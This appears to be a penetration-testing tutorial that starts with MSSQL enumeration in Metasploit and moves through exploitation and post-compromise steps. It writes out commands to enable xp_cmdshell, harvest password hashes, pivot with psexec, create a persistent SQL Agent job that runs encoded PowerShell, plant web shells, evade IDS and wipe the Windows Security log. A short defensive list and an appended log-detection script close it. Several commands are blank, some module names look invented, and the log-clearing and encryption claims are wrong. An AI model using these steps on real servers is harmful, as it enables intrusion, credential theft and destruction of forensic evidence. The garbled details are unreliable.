Perform Enumeration of MSSQL with Metasploit

In the realm of cybersecurity, understanding how to enumerate Microsoft SQL Server (MSSQL) databases is a critical skill for penetration testers and ethical hackers. Metasploit, a powerful open-source penetration testing framework, provides tools to automate this process. Enumeration involves gathering information about a target system to identify potential vulnerabilities. This article will guide you through the steps of performing MSSQL enumeration using Metasploit, explain the underlying principles, and highlight ethical considerations.


Introduction

Microsoft SQL Server (MSSQL) is one of the most widely used relational database management systems (RDBMS) globally. Enumeration of MSSQL databases helps identify misconfigurations, weak passwords, and other vulnerabilities that could be exploited. Its prevalence in enterprise environments makes it a prime target for attackers. Metasploit, a versatile toolkit, simplifies this process by offering pre-built modules and scripts tailored for database enumeration.

This article will walk you through the process of performing MSSQL enumeration with Metasploit, from setup to post-exploitation. By the end, you’ll understand how to make use of Metasploit’s capabilities while adhering to ethical guidelines.


Step-by-Step Guide to Enumerating MSSQL with Metasploit

Step 1: Set Up Metasploit

Before diving into enumeration, ensure Metasploit is installed and configured on your system.

  1. Install Metasploit:

    • On Linux, use the following command:
      sudo apt-get install metasploit-framework  
      
    • On Windows, download the Metasploit Framework from the official website and follow the installation instructions.
  2. Launch Metasploit:
    Open a terminal and type:

    msfconsole  
    

    This starts the Metasploit console, where you’ll execute commands.

Step 2: Scan for MSSQL Instances

Metasploit includes a module to scan for MSSQL servers. This step identifies potential targets.

  1. Run the MSSQL Scanner:
    In the Metasploit console, enter:

    use auxiliary/scanner/mssql/mssql_enum  
    

    This module scans for MSSQL instances on a specified IP range or hostname.

  2. Specify Target Parameters:

    • RHOSTS: The IP address or range of the target network.
    • RPORT: The default MSSQL port (1433).
    • USERNAME: Optional, if you have a specific user to test.
    • PASSWORD: Optional, if you suspect weak credentials.

    Example command:

    set RHOSTS 192.168.1.
    
    
  3. Execute the Scan:
    Run the module with:

    run  
    

    Metasploit will display a list of detected MSSQL instances, including their IP addresses and open ports.

Step 3: Exploit Vulnerabilities

Once you’ve identified an MSSQL instance, the next step is to exploit known vulnerabilities. Metasploit provides modules for this purpose.

  1. Search for Exploits:
    Use the search command to find relevant modules:

    search mssql  
    

    This will list all MSSQL-related exploits in the Metasploit database.

  2. Select an Exploit:
    Choose an exploit based on the target’s configuration. For example, the mssql_enum module is used for enumeration, but other modules like mssql_remote_code_execution might be applicable if specific vulnerabilities exist.

  3. Configure the Exploit:
    Set the target IP and any required credentials:

    set RHOSTS   
    set USERNAME   
    set PASSWORD   
    
  4. Run the Exploit:
    Execute the module with:

    exploit  
    

    If successful, Metasploit will establish a connection to the target database, allowing you to interact with it.

Step 4: Post-Exploitation

After gaining access to the MSSQL database, you can perform further actions to gather more information or escalate privileges.

  1. Enumerate Database Users:
    Use the sql_enum_users module to list all users and their permissions:

    use auxiliary/enum/mssql/sql_enum_users  
    
  2. Retrieve Database Schema:
    The sql_enum_databases module helps identify available databases and their structures:

    use auxiliary/enum/mssql/sql_enum_databases  
    
  3. Extract Data:
    If you have access, use the sql_exec module to run SQL queries directly on the database:

    
    

Step 5: Privilege Escalation & Lateral Movement

With a foothold inside the database, you can often take advantage of the database service to move deeper into the network.

  1. Enable xp_cmdshell – If the SQL Server service account has sufficient privileges, you can turn on the extended stored procedure to execute OS commands:

    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
    

    Once enabled, run system commands directly from the database:

    EXEC xp_cmdshell 'whoami'
    
  2. Harvest Credentials – Query the sys.server_principals and sys.sql_logins tables to collect usernames and password hashes (if the server is configured for mixed‑mode authentication).

    SELECT name, password_hash FROM sys.sql_logins;
    
  3. Pivot to Other Services – Use the obtained credentials to authenticate to other hosts (e.g., SMB shares, RDP, or additional database instances). Metasploit’s exploit/windows/smb/psexec or auxiliary/scanner/rdp/rdp_login modules are handy for this purpose.

Step 6: Maintaining Access & Persistence

After confirming the value of the compromised database, establish a persistent back‑door while minimizing detection.

  1. Create a SQL Agent Job – Schedule a job that runs a payload at a regular interval:

    USE msdb;
    EXEC sp_add_job @job_name = 'PersistJob';
    EXEC sp_add_jobstep @job_name = 'PersistJob',
         @step_name = 'RunCmd',
         @subsystem = 'CMDEXEC',
         @command = 'powershell -EncodedCommand ';
    EXEC sp_add_schedule @schedule_name = 'Every5Min',
         @freq_type = 4, @freq_interval = 1, @freq_subday_type = 4, @freq_subday_interval = 5;
    EXEC sp_attach_schedule @job_name = 'PersistJob', @schedule_name = 'Every5Min';
    EXEC sp_add_jobserver @job_name = 'PersistJob';
    
  2. Inject a Web Shell – If the database is linked to a web application, upload a lightweight PHP/ASPX shell via xp_cmdshell or by writing directly to the web root using bcp or OPENROWSET.

  3. Encrypt Traffic – Wrap subsequent Metasploit sessions with SSL/TLS (set EnableStageEncoding true and set StageEncoder x86/shikata_ga_nai) to evade network‑based IDS/IPS signatures.

Step 7: Covering Tracks

Minimise forensic evidence to prolong access.

  1. Clear SQL Logs – Delete entries from the error log and audit tables:

    EXEC xp_readerrorlog 0, 1, N'Login failed';  -- review then delete if possible
    DBCC SHRINKFILE (N'msdblog', TRUNCATEONLY);
    
  2. Remove Temporary Files – Delete any scripts or payloads written to disk via xp_cmdshell.

    EXEC xp_cmdshell 'del C:\temp\payload.exe'
    
  3. Reset Audit Trails – If the server uses Windows Event Logging, clear relevant event IDs (e.g., 4625, 4624) using wevtutil cl Security.


Conclusion

Leveraging Metasploit’s MSSQL modules provides a structured pathway from initial discovery to deep network compromise. By methodically enumerating instances, exploiting known weaknesses, and then escalating privileges, an attacker can turn a single database foothold into a persistent, low‑noise presence across the enterprise.

Defenders should counter these techniques by:

  • Restricting network access to MSSQL ports (1433/1434) and using firewalls or VLAN segmentation.
  • Enforcing least‑privilege accounts and disabling xp_cmdshell unless absolutely required.
  • Auditing and rotating credentials regularly, and monitoring for anomalous SQL queries or job creation.
  • Deploying intrusion detection signatures that flag Metasploit‑specific payloads and encoded stages.
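As an added illustration of the monitoring bullet above (this script is not part of the original article), here is a small Python parser for SQL Server ERRORLOG lines that flags the two artefacts the workflow in this article leaves behind: a burst of failed logins from one client, as produced by the scanning in Step 2, and the sp_configure change that enables xp_cmdshell in Step 5. The log lines are constructed samples in the standard ERRORLOG format, and the failure threshold and time window are assumed tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in SQL Server ERRORLOG format (not from any real server).
SAMPLE_ERRORLOG = """\
2024-03-01 09:12:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 09:12:01.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 09:12:01.60 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.1.50]
2024-03-01 09:12:01.85 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 09:12:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-03-01 09:40:15.00 Logon       Login failed for user 'reportsvc'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2024-03-01 09:41:02.00 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-01 09:41:02.20 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# Error 18456 lines carry the login name and client address; sp_configure changes are logged per option.
LOGIN_FAIL = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) Logon\s+Login failed for user "
                        r"'(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
CONFIG_CHANGE = re.compile(r"^(?P<ts>\S+ \S+) spid\d+\s+Configuration option '(?P<opt>[^']+)' "
                           r"changed from (?P<old>\d+) to (?P<new>\d+)")

def analyze_errorlog(text, threshold=5, window=timedelta(minutes=1)):
    """Return alerts: ('xp_cmdshell_enabled', ts) and ('login_bruteforce', client_ip, failures).
    threshold/window are assumed tuning values, not SQL Server defaults."""
    alerts = []
    failures = defaultdict(list)  # client ip -> timestamps of failed logins
    for line in text.splitlines():
        m = LOGIN_FAIL.match(line)
        if m:
            failures[m["ip"]].append(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"))
            continue
        m = CONFIG_CHANGE.match(line)
        if m and m["opt"] == "xp_cmdshell" and m["new"] == "1":
            alerts.append(("xp_cmdshell_enabled", m["ts"]))
    for ip, stamps in failures.items():
        stamps.sort()
        # flag a client once if any `threshold` consecutive failures fall inside `window`
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                alerts.append(("login_bruteforce", ip, len(stamps)))
                break
    return alerts

if __name__ == "__main__":
    for alert in analyze_errorlog(SAMPLE_ERRORLOG):
        print(alert)
```

Feed it the text returned by xp_readerrorlog (mentioned in Step 7) or the ERRORLOG file itself; the single failed login from 10.0.0.7 stays below the threshold and is not reported.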

Understanding both the offensive workflow and the defensive mitigations equips security professionals to harden their environments, detect intrusions early, and respond effectively when a breach occurs.
